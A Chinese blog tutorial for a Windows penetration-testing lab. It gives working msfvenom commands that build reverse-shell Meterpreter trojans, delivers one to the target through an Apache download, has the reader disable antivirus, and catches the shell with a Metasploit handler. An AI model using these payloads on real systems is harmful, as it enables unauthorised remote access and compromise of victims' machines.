msfvenom生成后台木马监听目标(windows渗透测试)

发布于 2023-11-25  703 次阅读


一、获取shell权限

1.简介

针对windows操作系统的渗透测试

操作过程概况:利用msf生成一个后台木马,使用exploit/multi/handler模块,通过对方打开的形式获取权限,可以进入后渗透对目标进行监听等操作。

2.MsfVenom介绍

首先msf就是Metaaploit,venom就是病毒。
msfvenom是msfpayload和msfencode的组合。将这两个工具集成在一个框架实例中。进一步来说,msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。

3.kali生成木马文件,靶机获取:

3.1:后台木马生成

windows可执行程序后门:msfvenom-p windows/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Linux可执行程序后门:msfvenom-p linux/x64/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
php脚本后门: msfvenom -p php/meterpreter/reverse tcp LHOST =<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
python脚本后门:msfvenom-p python/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

在这使用Windos可执行程序后门

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.115.4 LPORT=1145 -f exe -o /var/www/html/ikun.exe

参数解释

  • payload:windows/meterpreter/reverse_tcp 系统/结构/作用方式
  • lhost : 监听地址
  • lport:监听端口
  • -o 在指定路径下生成文件

注意在代码中LHOST:192.168.115.4与LPORT:1145要根据实际情况来更改

image-20231125181717431

3.2 在靶机上获取到木马文件

方法一:通过Apache开启网站访问服务上传木马文件,靶机访问后获取

(上面的生成木马文件的指令已经指定了shell.exe生成在网页根目录下)

1.开启apache将木马上传到网页上,然后windows以访问网页的形式下载木马

service apache2 restart //重启apache服务
访问渗透机出现以下后面就成功了,如果没有就说明没有安装apache服务

image-20231125180614139

靶机访问kali创建的网站,我这里是:192.168.115.4,获取ikun.exe文件

即:192.168.115.4/ikun.exe

注意:需要把Windows自带的杀毒软件关了,否则会删掉我们的木马文件

image-20231125180811686

4. 使用模块use exploit/multi/handler,配置参数

msfconsole
use exploit/multi/handler   //使用模块
set PAYLOAD windows/x64/meterpreter/reverse_tcp   //设置payload
set LHOST 192.168.115.4    //设置192.168.115.4进行监听 
set LPORT 1145    //监听端口为1145

开始攻击:输入run

在靶机上打开ikun.exe

返回kali输入getuid可获得靶机用户名

image-20231125183750854

image-20231125183830482

下次见面会是什么时候呢?
最后更新于 2023-11-25